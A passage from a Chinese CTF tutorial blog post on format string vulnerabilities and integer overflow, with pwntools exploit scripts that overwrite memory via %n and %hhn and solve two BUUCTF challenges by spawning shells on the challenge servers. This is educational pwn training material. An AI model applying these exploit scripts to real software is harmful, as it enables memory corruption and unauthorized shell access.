class="line">    <span class="built_in">puts</span>(<span class="string">&quot;modified b for a big number!&quot;</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<h3 id="2-2-1-将c覆盖为16"><a href="#2-2-1-将c覆盖为16" class="headerlink" title="2.2.1 将c覆盖为16"></a>2.2.1 将c覆盖为16</h3><p>c的地址已经打印出来了，只需要计算覆盖偏移，输入AAAA%p%p%p%p%p%p%p：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf19.png?x-oss-process=style/watermark"
                     
                ></p>
<p>可以看到第一次出现0x41时，是格式化字符串的第 6 个参数。使用%n将c的地址覆盖，覆盖为16：</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">sh = process(<span class="string">&#x27;./overwrite&#x27;</span>)</span><br><span class="line">c_addr = <span class="built_in">int</span>(sh.recvuntil(<span class="string">&#x27;\n&#x27;</span>, drop=<span class="literal">True</span>), <span class="number">16</span>)</span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(c_addr)</span><br><span class="line">payload = p32(c_addr) + <span class="string">&#x27;a&#x27;</span>*<span class="number">12</span> + <span class="string">&#x27;%6$n&#x27;</span><span class="comment">#c的地址加上12个字符为16，将其写入到第6个参数，也就是我们输入的c_addr的位置。</span></span><br><span class="line"><span class="built_in">print</span> payload</span><br><span class="line">sh.sendline(payload)</span><br><span class="line"><span class="built_in">print</span> sh.recv()</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure></div>

<p>成功输出modified.c：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf20.png?x-oss-process=style/watermark"
                     
                ></p>
<h3 id="2-2-2-将a覆盖为2"><a href="#2-2-2-将a覆盖为2" class="headerlink" title="2.2.2  将a覆盖为2"></a>2.2.2  将a覆盖为2</h3><p>我们可以通过ida文件知道a的地址，但是，我们将地址输入后，就已经是4个字节了，怎么才能使得%n统计的字符为2呢？可以先输入两个垃圾字符，然后再输入%n，最后再跟上我们的地址，即aa%k$n+addr，aa%k$n有6个字节，需要占两个栈空间，因此我们的参数位置就变成了第8个。</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">sh = process(<span class="string">&#x27;./overwrite&#x27;</span>)</span><br><span class="line">a_addr = <span class="number">0x0804A024</span></span><br><span class="line">payload = <span class="string">&#x27;aa%8$naa&#x27;</span> + p32(a_addr)<span class="comment">#aa两个字节，%n=2，写入第8个参数，即a的地址里面</span></span><br><span class="line">sh.sendline(payload)</span><br><span class="line"><span class="built_in">print</span> sh.recv()</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure></div>

<p>成功输出modified a for a small number：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf21.png?x-oss-process=style/watermark"
                     
                ></p>
<h3 id="2-2-3-将b覆盖为0x12345678"><a href="#2-2-3-将b覆盖为0x12345678" class="headerlink" title="2.2.3 将b覆盖为0x12345678"></a>2.2.3 将b覆盖为0x12345678</h3><p>这是一个很大的数，利用%n不太可能（需要太多垃圾数据），因此覆盖的时候我们直接以字节形式，一个字节一个字节的将这个数写进栈中。0x12345678按照小端序存储的方式为：78 56 34 12。</p>
<p>格式化字符串里面有两个标志：h和 hh。具体来说，h表示将整数作为带符号的短整数（16位）进行转换，输出结果为2个字符，如果整数大于16位，只保留后面的16位；而hh表示将整数作为带符号的字符（8位）进行转换，输出结果为1个字符，如果整数大于8位，只保留后面的8位。</p>
<p>举例，代码如下：</p>
<div class="highlight-container" data-rel="C"><figure class="iseeu highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">   <span class="type">int</span> num=<span class="number">30504</span>;</span><br><span class="line">   <span class="built_in">printf</span>(<span class="string">&quot;以h格式输出：%hx\n&quot;</span>,num);</span><br><span class="line">   <span class="built_in">printf</span>(<span class="string">&quot;以hh格式输出：%hhx\n&quot;</span>,num);</span><br><span class="line">   <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<p>输出结果：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf22.png?x-oss-process=style/watermark"
                     
                ></p>
<p>可以看到，以h格式输出时，整数30504被转换为2个字符的十六进制数”7728”，而以hh格式输出时，整数30504被转换为1个字符的十六进制数”28”。</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">sh = process(<span class="string">&#x27;./overwrite&#x27;</span>)</span><br><span class="line">b_addr=<span class="number">0x0804A028</span></span><br><span class="line">payload = p32(b_addr)+p32(b_addr+<span class="number">1</span>)+p32(b_addr+<span class="number">2</span>)+p32(b_addr+<span class="number">3</span>)</span><br><span class="line">payload += <span class="string">&#x27;%104x&#x27;</span>+<span class="string">&#x27;%6$hhn&#x27;</span>+<span class="string">&#x27;%222x&#x27;</span>+<span class="string">&#x27;%7$hhn&#x27;</span>+<span class="string">&#x27;%222x&#x27;</span>+<span class="string">&#x27;%8$hhn&#x27;</span>+<span class="string">&#x27;%222x&#x27;</span>+<span class="string">&#x27;%9$hhn&#x27;</span></span><br><span class="line"><span class="comment">#到 %6$hhn 前面有4个地址也就是16个字符，16+104=120=0x78，120+222=342=0x156，hh只取后面两个字节，就是0x56，</span></span><br><span class="line"><span class="comment">#同理，后面依次为0x234、0x312 即0x34、0x12。</span></span><br><span class="line">sh.sendline(payload)</span><br><span class="line"><span class="built_in">print</span> sh.recv()</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure></div>

<p>也可以用pwntools自带的函数：</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sh.sendline(fmtstr_payload(<span class="number">6</span>, &#123;<span class="number">0x804A028</span>:<span class="number">0x12345678</span>&#125;))</span><br></pre></td></tr></table></figure></div>

<p>成功输出modified b for a big number! </p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf23.png?x-oss-process=style/watermark"
                     
                ></p>
<h1 id="三、例题"><a href="#三、例题" class="headerlink" title="三、例题"></a>三、例题</h1><p>buuctf题目：<a class="link"   target="_blank" rel="noopener" href="https://buuoj.cn/challenges#[%E7%AC%AC%E4%BA%94%E7%A9%BA%E9%97%B42019%20%E5%86%B3%E8%B5%9B]PWN5" >https://buuoj.cn/challenges#[%E7%AC%AC%E4%BA%94%E7%A9%BA%E9%97%B42019%20%E5%86%B3%E8%B5%9B]PWN5 <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<p>题目名字：[第五空间2019 决赛]PWN5</p>
<p>反汇编：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf24.png?x-oss-process=style/watermark"
                     
                ></p>
<p>可以看到存在格式化字符串漏洞，然后有system函数。程序首先会生成一个随机值，然后让用户输入一个值，如果该值与随机值相等，就可以获取shell。</p>
<p>可以看到随机值储存在0x804C44的地方，如果我们可以控制这个地方，就可以控制随机值，从而执行shell了。</p>
<p>利用格式化字符串漏洞：</p>
<p>先输入AAAA%p%p%p%p%p%p%p%p%p%p%p%p判断参数位置：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf26.png?x-oss-process=style/watermark"
                     
                ></p>
<p>可以看到第一次出现0x41时，是格式化字符串的第 10个参数。</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p=remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">28201</span>)</span><br><span class="line">payload = fmtstr_payload(<span class="number">10</span>,&#123;<span class="number">0x804C044</span>:<span class="number">0x1</span>&#125;)<span class="comment">#将随机数写为1</span></span><br><span class="line">p.recvuntil(<span class="string">&#x27;name:&#x27;</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;passwd:&#x27;</span>)</span><br><span class="line">p.sendline(<span class="string">&quot;1&quot;</span>)<span class="comment">#输入1，执行system</span></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></div>

<p>成功获取flag:</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf25.png?x-oss-process=style/watermark"
                     
                ></p>
<h1 id="四、整数溢出"><a href="#四、整数溢出" class="headerlink" title="四、整数溢出"></a>四、整数溢出</h1><p>整数溢出（Integer Overflow）是一种计算机程序中常见的安全漏洞，它发生在整数类型变量存储的值超过了其最大可能值时。在计算机中，整数类型的变量通常有一定的位数（位数取决于所使用的编程语言或数据类型），这限制了它们可以存储的值的范围。当一个整数变量的值超过了其最大可能值时，就会发生整数溢出。</p>
<h2 id="4-1-原理"><a href="#4-1-原理" class="headerlink" title="4.1 原理"></a>4.1 原理</h2><p>在C语言中，整数的基本数据类型分为短整型(short)，整型(int)，长整型(long)，这三个数据类型还分为有符号和无符号，每种数据类型都有各自的大小范围，如下所示：</p>
<table>
<thead>
<tr>
<th align="center">类型</th>
<th align="center">字节</th>
<th align="center">范围</th>
</tr>
</thead>
<tbody><tr>
<td align="center">short int</td>
<td align="center">2byte(word)</td>
<td align="center">0<del>32767(0</del>0x7fff)  &#x2F;  -32768<del>-1(0x8000</del>0xffff)</td>
</tr>
<tr>
<td align="center">unsigned short int</td>
<td align="center">2byte(word)</td>
<td align="center">0<del>65535(0</del>0xffff)</td>
</tr>
<tr>
<td align="center">int</td>
<td align="center">4byte(dword)</td>
<td align="center">0<del>2147483647(0</del>0x7fffffff)  &#x2F;  -2147483648<del>-1(0x80000000</del>0xffffffff)</td>
</tr>
<tr>
<td align="center">unsigned int</td>
<td align="center">4byte(dword)</td>
<td align="center">0<del>4294967295(0</del>0xffffffff)</td>
</tr>
<tr>
<td align="center">long int</td>
<td align="center">8byte(qword)</td>
<td align="center">正: 0<del>0x7fffffffffffffff  &#x2F;  负:0x8000000000000000</del>0xffffffffffffffff</td>
</tr>
<tr>
<td align="center">unsigned long int</td>
<td align="center">8byte(qword)</td>
<td align="center">0~0xffffffffffffffff</td>
</tr>
</tbody></table>
<p>当程序中的数据超过其数据类型的范围，则会造成溢出，整数类型的溢出被称为整数溢出。</p>
<p>上界溢出有两种情况，一种是 <code>0x7fff + 1</code>， 另一种是 <code>0xffff + 1</code>。因为计算机底层指令是不区分有符号和无符号的，数据都是以二进制形式存在。所以 <code>add 0x7fff, 1 == 0x8000</code>，这种上界溢出对无符号整型就没有影响，但是在有符号短整型中，<code>0x7fff</code> 表示的是 <code>32767</code>，但是 <code>0x8000</code> 表示的是 <code>-32768</code>，用数学表达式来表示就是在有符号短整型中 <code>32767+1 == -32768</code>。第二种情况是 <code>add 0xffff, 1</code>，在有符号短整型中，<code>0xffff==-1，-1 + 1 == 0</code>，从有符号看这种计算没问题。但是在无符号短整型中，<code>0xffff == 65535, 65535 + 1 == 0</code>。</p>
<p>下届溢出一样也是有两种情况：</p>
<p>第一种是 <code>sub 0x0000, 1 == 0xffff</code>，对于有符号来说 <code>0 - 1 == -1</code> 没问题，但是对于无符号来说就成了 <code>0 - 1 == 65535</code>。</p>
<p>第二种是 <code>sub 0x8000, 1 == 0x7fff</code>，对于无符号来说是 <code>32768 - 1 == 32767</code> 是正确的，但是对于有符号来说就变成了 <code>-32768 - 1 = 32767</code>。</p>
<h2 id="4-2-例题"><a href="#4-2-例题" class="headerlink" title="4.2 例题"></a>4.2 例题</h2><p>题目链接：<a class="link"   target="_blank" rel="noopener" href="https://buuoj.cn/challenges#bjdctf_2020_babystack2" >https://buuoj.cn/challenges#bjdctf_2020_babystack2 <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a> </p>
<p>反汇编：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/int1.png?x-oss-process=style/watermark"
                     
                ></p>
<p>可以看到if里面判断的是有符号整型，而read里面的是无符号整型，因此利用负数使得read读出的长度大于buf的长度。从而进行栈溢出。存在后门：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/int3.png?x-oss-process=style/watermark"
                     
                ></p>
<p>exp：</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p=remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">27552</span>)</span><br><span class="line">back_addr=<span class="number">0x0400726</span></span><br><span class="line">p.recvuntil(<span class="string">&quot;the length of your name:\n&quot;</span>)</span><br><span class="line">p.sendline(<span class="string">&#x27;-1&#x27;</span>)<span class="comment">#利用整数溢出，使得read函数可以读取足够多的字节，进行栈溢出</span></span><br><span class="line">payload =<span class="string">&#x27;a&#x27;</span>*<span class="number">24</span>+p64(back_addr)<span class="comment">#read溢出到后门，直接获取shell</span></span><br><span class="line">p.recvuntil(<span class="string">&quot;What&#x27;s u name?\n&quot;</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></div>

<p>结果：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/int2.png?x-oss-process=style/watermark"
                     
                ></p>

            </div>

            
                <div class="post-copyright-info">
                    <div class="article-copyright-info-container">
    <ul>
        <li><strong>Title:</strong> 格式化字符串漏洞+整数溢出</li>
        <li><strong>Author:</strong> wutong</li>
        <li><strong>Created at:</strong> 2023-07-23 11:04:14</li>
        
            <li>
                <strong>Updated at:</strong> 2023-08-18 16:02:49
            </li>
        
        <li>
            <strong>Link:</strong> https://wutong01304.github.io/2023/07/23/fmtstr/
        </li>
        <li>
            <strong>License:</strong> This work is licensed under <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">CC BY-NC-SA 4.0</a>.
        </li>
    </ul>
</div>

                </div>
            

            
                <ul class="post-tags-box">
                    
                        <li class="tag-item">
                            <a href="/tags/Pwn/">#Pwn</a>&nbsp;
                        </li>
                    
                        <li class="tag-item">
                            <a href="/tags/fmtstr/">#fmtstr</a>&nbsp;
                        </li>
                    
                </ul>
            

            

            
                <div class="article-nav">
                    
                        <div class="article-prev">
                            <a class="prev"
                            rel="prev"
                            href="/2023/07/25/fix/"
                            >
                                <span class="left arrow-icon flex-center">
                                    <i class="fa-solid fa-chevron-left"></i>
                                </span>
                                <span class="title flex-center">
                                    <span class="post-nav-title-item">IDA修补简单漏洞</span>
                                    <span class="post-nav-item">Prev posts</span>
                                </span>
                            </a>
                        </div>
                    
                    
                        <div class="article-next">
                            <a class="next"
                            rel="next"
                            href="/2023/07/21/RSA/"
                            >
                                <span class="title flex-center">
                                    <span class="post-nav-title-item">RSA基本原理+常见攻击方法</span>
                                    <span class="post-nav-item">Next posts</span>
                                </span>
                                <span class="right arrow-icon flex-center">
                                    <i class="fa-solid fa-chevron-right"></i>
                                </span>
                            </a>
                        </div>
                    
                </div>
            


            
        </div>

        
            <div class="toc-content-container">
                <div class="post-toc-wrap">
    <div class="post-toc">
        <div class="toc-title">On this page</div>
        <div class="page-title">格式化字符串漏洞+整数溢出</div>
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%B8%80%E3%80%81%E5%9F%BA%E6%9C%AC%E5%8E%9F%E7%90%86"><span class="nav-text">一、基本原理</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-1%E5%9F%BA%E6%9C%AC%E7%9F%A5%E8%AF%86"><span class="nav-text">1.1基本知识</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#1-2-%E6%A0%88%E5%86%85%E5%AD%98%E5%88%86%E5%B8%83"><span class="nav-text">1.2 栈内存分布</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#1-3-%E6%BA%A2%E5%87%BA%E5%8E%9F%E7%90%86"><span class="nav-text">1.3 溢出原理</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BA%8C%E3%80%81%E6%94%BB%E5%87%BB%E5%8E%9F%E7%90%86"><span class="nav-text">二、攻击原理</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#2-1-%E6%B3%84%E9%9C%B2%E5%9C%B0%E5%9D%80"><span class="nav-text">2.1 泄露地址</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-2-%E8%A6%86%E7%9B%96%E5%9C%B0%E5%9D%80"><span class="nav-text">2.2 覆盖地址</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%B8%89%E3%80%81%E4%BE%8B%E9%A2%98"><span class="nav-text">三、例题</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%9B%9B%E3%80%81%E6%95%B4%E6%95%B0%E6%BA%A2%E5%87%BA"><span class="nav-text">四、整数溢出</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#4-1-%E5%8E%9F%E7%90%86"><span class="nav-text">4.1 原理</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4-2-%E4%BE%8B%E9%A2%98"><span class="nav-text">4.2 例题</span></a></li></ol></li></ol>

    </div>
</div>
            </div>
        
    </div>
</div>


                

            </div>
            
            

        </div>

        <div class="main-content-footer">
            <footer class="footer">
    <div class="info-container">
        <div class="copyright-info">
            &copy;
            
              <span>2023</span>
              -
            
            2023&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">wutong</a>
        </div>
        
        <div class="theme-info info-item">
            <span class="powered-by-container">POWERED BY <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" href="https://hexo.io">Hexo</a></span>
                <br>
            <span class="theme-version-container">THEME&nbsp;<a class="theme-version" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.2.1</a>
        </div>
        
        
        
        
        
        
        
    </div>  
</footer>
        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="article-tools-list">
        <!-- TOC aside toggle -->
        
            <li class="right-bottom-tools page-aside-toggle">
                <i class="fa-regular fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
    </ul>
</div>

        </div>
    

    <div class="right-side-tools-container">
        <div class="side-tools-container">
    <ul class="hidden-tools-list">
        <li class="right-bottom-tools tool-font-adjust-plus flex-center">
            <i class="fa-regular fa-magnifying-glass-plus"></i>
        </li>

        <li class="right-bottom-tools tool-font-adjust-minus flex-center">
            <i class="fa-regular fa-magnifying-glass-minus"></i>
        </li>

        <li class="right-bottom-tools tool-expand-width flex-center">
            <i class="fa-regular fa-expand"></i>
        </li>

        <li class="right-bottom-tools tool-dark-light-toggle flex-center">
            <i class="fa-regular fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="right-bottom-tools tool-scroll-to-bottom flex-center">
            <i class="fa-regular fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="visible-tools-list">
        <li class="right-bottom-tools toggle-tools-list flex-center">
            <i class="fa-regular fa-cog fa-spin"></i>
        </li>
        
            <li class="right-bottom-tools tool-scroll-to-top flex-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
        
    </ul>
</div>

    </div>

    <div class="image-viewer-container">
    <img src="">
</div>


    


</main>




<script src="/js/utils.js"></script>

<script src="/js/main.js"></script>

<script src="/js/layouts/navbarShrink.js"></script>

<script src="/js/tools/scrollTopBottom.js"></script>

<script src="/js/tools/lightDarkSwitch.js"></script>





    
<script src="/js/tools/codeBlock.js"></script>




    
<script src="/js/layouts/lazyload.js"></script>






  
<script src="/js/libs/Typed.min.js"></script>

  
<script src="/js/plugins/typed.js"></script>







<div class="post-scripts pjax">
    
        
<script src="/js/tools/tocToggle.js"></script>

<script src="/js/libs/anime.min.js"></script>

<script src="/js/layouts/toc.js"></script>

<script src="/js/plugins/tabs.js"></script>

    
</div>


    
<script src="/js/libs/pjax.min.js"></script>

<script>
    window.addEventListener('DOMContentLoaded', () => {
        window.pjax = new Pjax({
            selectors: [
                'head title',
                '.page-container',
                '.pjax',
            ],
            history: true,
            debug: false,
            cacheBust: false,
            timeout: 0,
            analytics: false,
            currentUrlFullReload: false,
            scrollRestoration: false,
            // scrollTo: true,
        });

        document.addEventListener('pjax:send', () => {
            Global.utils.pjaxProgressBarStart();
        });

        document.addEventListener('pjax:complete', () => {
            Global.utils.pjaxProgressBarEnd();
            window.pjax.executeScripts(document.querySelectorAll('script[data-pjax], .pjax script'));
            Global.refresh();
        });
    });
</script>




</body>
</html>
